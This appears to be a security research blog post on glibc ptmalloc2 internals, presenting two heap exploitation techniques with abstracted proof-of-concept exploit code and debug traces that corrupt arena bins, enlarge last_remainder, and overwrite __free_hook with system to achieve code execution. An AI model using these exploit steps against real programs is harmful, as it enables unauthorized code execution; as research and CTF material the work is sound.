I know, I know. With every new paper/post/challenge around ptmalloc2 if feels like everything has been said. And yes, one rarely needs to understand the Malloc Maleficarum to exploit a heap bug. Neither does one need to get PC control from wizardly metadata overwrites to exploit applications where function pointers, indexed arrays and the like already live on the heap.
Nowadays exploiting heap structures is often nothing more than finding a way to overwrite interesting structures residing on the heap, by having old chunks overwritten or new chunks allocated within areas under attacker control. Pure heap exploits have been discarded as almost impossible for quite a few years now.
So, what about this application where you have a full unbounded overflow on the heap but no interesting data structure worth targeting? Well, with glibc's malloc it may still be generically exploitable for code execution if it provides good enough heap massaging primitives.
Of course, we are not talking about a one-shot unlink() anymore. The two example techniques I will expose here require a strong control of the heap and several malloc/free/metadata overwrites to reach our goal.
By strong control, I mean having initial control (write) over an area of the heap spanning a few chunks and further perform arbitrary free/malloc sequences. Free can be performed on any address previously returned by malloc and we need to be able to normally write into newly allocated chunks (but don't require special control over the size of allocations).
If we don't have a libc leak, we need to add to that the ability to read into a free chunk, or an allocated chunk that hasn't been initialized at some point.
The global algorithm of ptmalloc2, the structure of heap chunks and the type of chunks have been described many, many, many times (and more) so I'll consider this as a pre-requisite to understanding what follows. What I feel hasn't been described as many times is what goes on within the blackbox of malloc, i.e. what the unsorted chunks list is, what the small and large bins are, how malloc chooses chunks to return, etc.
As one may know, free() is a fairly quick operation. Its main purpose is to place the newly freed chunk into the "unsorted chunks" doubly-linked list. It may also merge that chunk with the chunks right before and after if they were already free, after having unlinked those from the freelists they were in. The resulting chunk finishes up in the unsorted chunk list in any case.
The unsorted chunks list is a temporary list, where all kind of free chunks await to be "sorted" into bins. bins are doubly-linked list as well, and each bin is tied to a size range. The bin associated with the requested size is generally checked first by malloc to allow for an efficient allocation.
All of this is done in malloc(). When malloc is called, it tries different strategies to get a big enough memory space to fit the allocation request. At a high level, its strategy is, in order:
The "bins" are essentially 127 doubly-linked lists. The first one is the unsorted chunks list, then half of the remaining lists are for small bins (one for each 0x10 size), and the rest service large bin requests (with a wider range of size in each bin). Each sorted large chunk is on a secondary doubly-linked list, which sorts chunks in a large bin by size (that way malloc only has to check the first chunk of each bin to know if the bin can satisfy the request).
Memory-wise, these structures live in the malloc_state of the current arena. The main arena lives in libc's .data section and this will be the case for most non-threaded applications.
Getting forged addresses into the freelists is easy, but getting them out is a different story. Something interesting is that chunks need to satisfy different conditions to be taken out of the different free lists. In particular:
I'll now outline two techniques which will take advantage of these "inconsistencies" to achieve arbitrary code execution. In both cases our aim is to obtain control of the memory area where the sorted bin that will be used for the next allocation request is.
The main thing that I leverage in this post is the fact that getting a chunk out of the sorted bins only requires that chunk to be part of a valid linked list. This is particularly interesting when taking into account that the malloc_state of the arena itself has many memory addresses with correctly linked chunks in the form of bins.
In this first technique, we will also use the fact that unlinking a chunk from the unsorted chunks list sets chunk->bk->fd to the unsorted list chunk itself without further checks. We can leverage this to insert the unsorted list chunk in a sorted bin and get it out with the next alloc (the linked list condition will be satisfied unless the unsorted chunk is corrupted from previous allocs).
When controlling the unsorted chunks chunk and the first few small bins, we can get another chunk farther away in the bss as long as we can set its size to match the next allocation. By repeating this process we can control any bin.
I abstracted out the vulnerable application, structure offsets as well as reading and writing memory into wrapper classes, so that the snippets hereafter read as near pseudocode (hopefully). Also, for the sake of readability I assume that the initial heap bug (double free, use-after-free, overflow) + the ability to read/write into chunks and free them gets us free reign over chunks' metadata (excluding the first chunk under our control). This can be done in a variety of ways depending on the original bug and I feel proving this would unnecessarily contextualize the techniques here. However we won't read/write out of bounds of the initially controlled area or new chunks. I use fixed size allocations of 0x300 bytes, not very important but I feel it makes the technique more generic without inducing significant hurdles.
For each snippet I also report debug traces to show what happens at a lower level.
First things first, we allocate 5 small chunks on the heap and free the 2nd and 4th ones to get libc and heap leaks. Note that, since no chunk is free at that point, the libc leak is the address of the "top" field of the arena's malloc_state. This is also the chunk address of the unsorted chunks list (unsorted_chunks->fd - 0x10). We actually don't need the heap leak, but since it's there..
print "## Init" heap = Heap(read, write) # R/W primitives chunks = [Chunk(heap, malloc(0x300)) for _ in xrange(5)] print print "## Getting unsorted chunks address" free(chunks) free(chunks) unsorted_leak = chunks.fd heap_leak = chunks.bk # chunks libc_base = (unsorted_leak & ~0xfff) - LIBC_DATA_FIRST_PAGE heap.init_from_unsorted_leak(unsorted_leak) malloc(0x300) # re-allocate them malloc(0x300) print small_bin_0x300 = heap.get_bin_chunk(heap.smallbin_index(0x300)) small_bin_0x310 = heap.get_bin_chunk(heap.smallbin_index(0x310)) small_bin_0x320 = heap.get_bin_chunk(heap.smallbin_index(0x320))
## Init malloc(0x300) => 0x214f010 malloc(0x300) => 0x214f320 malloc(0x300) => 0x214f630 malloc(0x300) => 0x214f940 malloc(0x300) => 0x214fc50 ## Getting unsorted chunks address free(0x214f320) free(0x214f940) malloc(0x300) => 0x214f320 malloc(0x300) => 0x214f940 Libc @ 0x7ff011ce2000, heap at 0x214f000
When taking the chunk out the unsorted bin, we have a chunk->bk->fd = &unsorted_chunks, which is why we can get the unsorted_chunks address written almost anywhere. If we get it written to the right small bin, the next allocation will return a pointer to the unsorted_chunks chunk's fd field.
print "## Getting unsorted_chunks in and out of the bin" free(chunks) chunks.bk = small_bin_0x310.data - 8 malloc(0x300) print "- Unsorted chunks" heap.unsorted_chunks.dump(True) print "- Smallbin 0x310" small_bin_0x310.dump(True) bss_chunk = Chunk(heap, malloc(0x300)) # Unsorted chunks
## Getting unsorted_chunks in and out of the bin free(0x214f320) 0x214f310->bk = 0x7ff01207be60 malloc(0x300) => 0x214f320 - Unsorted chunks -> Chunk @ 0x7ff01207bb58 fd = 0x214f310 bk = 0x7ff01207be60 - Smallbin 0x310 -> Chunk @ 0x7ff01207be58 fd = 0x7ff01207be58 bk = 0x7ff01207bb58 malloc(0x300) => 0x7ff01207bb68
From there, we can take advantage of the fact that we control the unsorted_chunks list, and that getting a chunk out of that list only requires the chunk to match the next requested size:
print "## Getting a chunk farther away in the bss" bss_chunk.fd = bss_chunk.data+0x280 bss_chunk.bk = bss_chunk.data+0x280 # Straight out of unsorted chunks if size matches next alloc bss_chunk.set_qword_at_offset(0x288, 0x311) bss_chunk_2 = Chunk(heap, malloc(0x300))
## Getting a chunk farther away in the bss 0x7ff01207bb58->fd = 0x7ff01207bde8 0x7ff01207bb58->bk = 0x7ff01207bde8 *(0x7ff01207bdf0) = 0x311 malloc(0x300) => 0x7ff01207bdf8
We can then repeat to get chunks farther away in the bss until we hit the desired small bin. At this point bss_chunk + bss_chunk_2 already span all small bins:
bss_chunk_2.write_at_offset(0, "A"*0x300) print "- Smallbin 0x310" small_bin_0x310.dump(True)
- Smallbin 0x310 -> Chunk @ 0x7ff01207be58 fd = 0x4141414141414141 bk = 0x4141414141414141
So we have control of the sorted bin that will serve the next allocation , as well as the memory that is right after. We will actually end up in a very similar state after the next technique so we'll tackle this at the end (and you won't believe what happens next).
A fairly well-known consequence of the current unlink() is that any address that points to an attackers-controlled chunk can be rewritten to point to ~itself or another location that points to the same chunk. An example where this would be directly exploitable is an application that stores a table of heap addresses at a predictable location.
The idea of this 2nd technique is similar: the heap state itself contains quite a few pointers to attacker-controlled locations in the form of the bin list heads. If we can leverage this to successfully unlink() a chunk pointing to a bin, we would then get back our libc .data pointer with the next allocation
Note that in the following example I use small bins but this should be possible with any chunk type.
So we'll reboot the PoC exploit started in the previous section after the initialization code (i.e after the small_bin_0x320 definition).
To follow the idea explained above, we'll get the address of a chunk we control, chunks, into small bins of size 0x300 and 0x310. Something surprising about how chunks are gotten out of the unsorted chunks list is that it is possible to have a chunk that will be put in the sorted bin matching the current allocation, yet won't be returned when processing the unsorted chunks list. This is possible because small bins have a 0x10 granularity while chunksize() used to get the chunk's size out of unsorted bins aligns sizes to 8 bytes boundaries. Very important if the targeted application can only allocate from one bin like in our imaginary case.
print "## Inserting chunks in small bin 0x300" free(chunks) free(chunks) chunks.size = 0x301 malloc(0x300) # This gets old chunk 3 and puts chunk 1 in bin print "- Smallbin 0x300" small_bin_0x300.dump(True) print print "## Inserting chunks in small bin 0x310" chunks.size = 0x311 chunks.size |= 1 # Restore in-use free(chunks) free(chunks) chunks.size |= 8 # avoid the chunk being returned malloc(0x300) print "- Smallbin 0x310" small_bin_0x310.dump(True) print
## Inserting chunks in small bin 0x300 free(0xaa3320) free(0xaa3940) 0xaa3310->size = 0x301 malloc(0x300) => 0xaa3940 - Smallbin 0x300 -> Chunk @ 0x7f4935721e48 fd = 0xaa3310 bk = 0xaa3310 ## Inserting chunks in small bin 0x310 0xaa3310->size = 0x311 0xaa3620->size = 0x311 free(0xaa3320) free(0xaa3940) 0xaa3310->size = 0x319 malloc(0x300) => 0xaa3940 - Smallbin 0x310 -> Chunk @ 0x7f4935721e58 fd = 0xaa3310 bk = 0xaa3310
They do not have to be consecutive, but having two separate places with our attacker-controlled address allows us to perform an unlink which does not only empty the target bin. We craft chunks to have its fields pointing to the two bins and satisfy the unlink preconditions, and free chunks to trigger forward coalescing into chunks. chunks->size does not have PREV_INUSE from the last round of frees.
print "## Unlinking chunks to set small bin 0x310 ->bk" chunks.size = 0x311 # FD points to SB(310), FD->bk is SB(310)->bk (our target) # BK points to SB(300), BK->fd is SB(300)->fd (value it receives) chunks.bk = small_bin_0x300 chunks.fd = small_bin_0x310 free(chunks) # coalesced forward into chunks print "- Smallbin for 0x300 allocs" small_bin_0x300.dump(True) print "- Smallbin for 0x310 allocs" small_bin_0x310.dump(True) print
## Unlinking chunks to set small bin 0x310 ->bk 0xaa3310->size = 0x311 0xaa3310->bk = 0x7f4935721e48 0xaa3310->fd = 0x7f4935721e58 free(0xaa3010) - Smallbin for 0x300 allocs -> Chunk @ 0x7f4935721e48 fd = 0x7f4935721e58 bk = 0xaa3310 - Smallbin for 0x310 allocs -> Chunk @ 0x7f4935721e58 fd = 0xaa3310 bk = 0x7f4935721e48
As we can see on the trace above, the first chunk in the bin (0x7f4935721e48 here) is the chunk address of the 0x300 bin (if we had only used the 0x310 small bin, the bk field would have become 0x7f4935721e58 and the bin would have been considered empty).
The small bin 0x310 will be checked first to satisfy 0x300 allocs, we can therefore get the 0x7f4935721e48 chunk directly out:
print "## Getting chunk pointing to small bin 0x300 out of bin 0x310" chunks.fd = small_bin_0x300 bss_chunk = Chunk(heap, malloc(0x300)) print
## Getting chunk pointing to small bin 0x300 out of bin 0x310 0xaa3310->fd = 0x7f4935721e48 malloc(0x300) => 0x7f4935721e58
We're back at the same level of control than with the first PoC: we control the bin that will serve the next allocation and the surrounding memory.
There are probably many ways to finish up from that point, here I'll use the last_remainder mechanism outlined above when explaining how chunks get out of the unsorted chunks list.
The idea I chose is to recreate fake chunks in the controlled section of libc memory and control which addresses are returned by malloc() through the sorted bins. Taking advantage of the last_remainder heuristic we can then allocate indefinitely from libc's .data, and then .bss sections. The bss has many data structures that yield direct PC control, amongst which __free_hook which would be directly exploitable here.
From where we left off the two exploitations, we need to control a > 0x300 chunk if we want the last remainder to come from a chunk we controlled. The snippets hereafter are the end of PoC #2.
Since the data (fd field) of the chunk that was just returned points to the small bin 0x300 chunk (i.e. 0x10 bytes before the fd field of that bin), we can control the address of the next chunk that will come out of the bin. We can set it to an arbitrary bin farther ahead which will satisfy the chunk->bk->fd == chunk precondition if the bin is empty.
print "## Leveraging bin control to get another chunk farther away" bss_chunk.set_qword_at_offset(0x18, small_bin_0x300.data + 0x280) bss_chunk_2 = Chunk(heap, malloc(0x300)) print
## Leveraging bin control to get another chunk farther away *(0x7f4935721e70) = 0x7f49357220d8 malloc(0x300) => 0x7f49357220e8
We can then craft a larger chunk that starts in bss_chunk and ends in bss_chunk_2, and add that chunk in a small bin for larger allocations. We then place that chunk into the unsorted chunks list. Upon the next allocation, if smaller bins are correctly linked and empty, malloc() will split the chunk and have its second part becoming the last_remainder.
To start from a clean state we first empty the unsorted chunks list which contains chunks from the previous unlink operation.
print "## Some cleanup" # Empty 0x310 bin and unsorted chunks bss_chunk.set_qword_at_offset(0x18, small_bin_0x300.data) malloc(0x300) # chunks was merged with chunks chunks.fd = heap.unsorted_chunks chunks.bk = heap.unsorted_chunks malloc(0x300) # chunks and empty unsorted chunks print print "## Set bin 0x320 as non-empty" chunks.size = 0x321 chunks.bk = 0x311 # Restore in-use chunks.bk = 0x311 free(chunks) free(chunks) malloc(0x300) print "- Smallbin 0x320" small_bin_0x320.dump(True) print print "## Alloc out of fake chunk in bss_chunk to control last_remainder" # Start fake chunk within first bss chunk # Fake chunk starts at offset 0x30 into bss_chunk bss_chunk.set_qword_at_offset(0x28, bss_chunk.data + 0x30) # Bin 0x320 -> bk print "- Smallbin 0x320" small_bin_0x320.dump(True) fake_chunk_size = 0x380 bss_chunk.set_qword_at_offset(0x38, fake_chunk_size | 1) # set fake size bss_chunk_2.set_qword_at_offset(0x120, fake_chunk_size) malloc(0x300) print "- Last remainder:", hex(heap.last_remainder) print
## Some cleanup *(0x7f4935721e70) = 0x7f4935721e58 malloc(0x300) => 0xaa3010 0xaa3310->fd = 0x7f4935721b58 0xaa3310->bk = 0x7f4935721b58 malloc(0x300) => 0xaa3320 ## Set bin 0x320 as non-empty 0xaa3310->size = 0x321 0xaa3620->bk = 0x311 0xaa3930->bk = 0x311 free(0xaa3320) free(0xaa3940) malloc(0x300) => 0xaa3940 - Smallbin 0x320 -> Chunk @ 0x7f4935721e68 fd = 0xaa3310 bk = 0xaa3310 ## Alloc out of fake chunk in bss_chunk to control last_remainder *(0x7f4935721e80) = 0x7f4935721e88 - Smallbin 0x320 -> Chunk @ 0x7f4935721e68 fd = 0xaa3310 bk = 0x7f4935721e88 *(0x7f4935721e90) = 0x381 *(0x7f4935722208) = 0x380 malloc(0x300) => 0x7f4935721e98 - Last remainder: 0x7f4935722198
Finally, we only need to enlarge the size of the last_remainder chunk so that it encompasses the targeted libc data structures.
print "## Enlarging last_remainder and getting it in unsorted bin" last_remainder = bss_chunk_2.chunk_at_offset(0xb0) last_remainder.size = 0x3001 chunks.size = 0x311 chunks.size = 0x311 free(chunks) chunks.fd = heap.last_remainder chunks.bk = heap.last_remainder malloc(0x300) print "- Unsorted bin" heap.unsorted_chunks.dump(True) print
## Enlarging last_remainder and getting it in unsorted bin 0x7f4935722198->size = 0x3001 0xaa3310->size = 0x311 0xaa3620->size = 0x311 free(0xaa3320) 0xaa3310->fd = 0x7f4935722198 0xaa3310->bk = 0x7f4935722198 malloc(0x300) => 0xaa3320 - Unsorted bin -> Chunk @ 0x7f4935721b58 fd = 0xaa3310 bk = 0x7f4935722198
We can now allocate as much as we want in libc's .data and .bss until we reach whatever data structure we target. For instance, we can overwrite __free_hook and free an arbitrary chunk to gain code exec:
print "## Alloc spree to overwrite __free_hook" last_remainder.fd = heap.unsorted_chunks last_remainder.bk = heap.unsorted_chunks # Alloc until __free_hook is overwriteable, fixed offset depending on the libc malloc(0x300) malloc(0x300) malloc(0x300) malloc(0x300) malloc(0x300) malloc(0x300) malloc(0x300) target = Chunk(heap, malloc(0x300)) target.set_qword_at_offset(0x70, libc_base + LIBC_SYSTEM) chunks.write_at_offset(0, "id\x00") free(chunks) # RIP
## Alloc spree to overwrite __free_hook 0x7f4935722198->fd = 0x7f4935721b58 0x7f4935722198->bk = 0x7f4935721b58 malloc(0x300) => 0x7f49357221a8 malloc(0x300) => 0x7f49357224b8 malloc(0x300) => 0x7f49357227c8 malloc(0x300) => 0x7f4935722ad8 malloc(0x300) => 0x7f4935722de8 malloc(0x300) => 0x7f49357230f8 malloc(0x300) => 0x7f4935723408 malloc(0x300) => 0x7f4935723718 *(0x7f4935723788) = 0x7f49353c7450 free(0xaa3320) uid=1000(user) gid=1000(user) groups=1000(user)
And that's it, we've been able to execute arbitrary code from a pure heap exploit and independently from the data structures on the heap. To sum up, these techniques require to be able to freely write an area of the heap that spans a few small bins, most likely through a repeatable heap bug, and then malloc/free chunks of our choosing.
This is unlikely to be useful when exploiting complex applications which often have numerous data structures and/or vtables on the heap already, but could be interesting if more common techniques cannot yield code execution and more generally to keep in mind that heap bugs are exploitable until proven otherwise.
Who knows, it might even be useful in CTFs ;)
NB: a small check has been introduced to harden the unsorted chunks list a bit. This ensures that one cannot go from a single controlled pointer to overwritten arena metadata (as shown in Technique 1), but it's obviously still possible to get the unsorted chunks list out with slightly more control.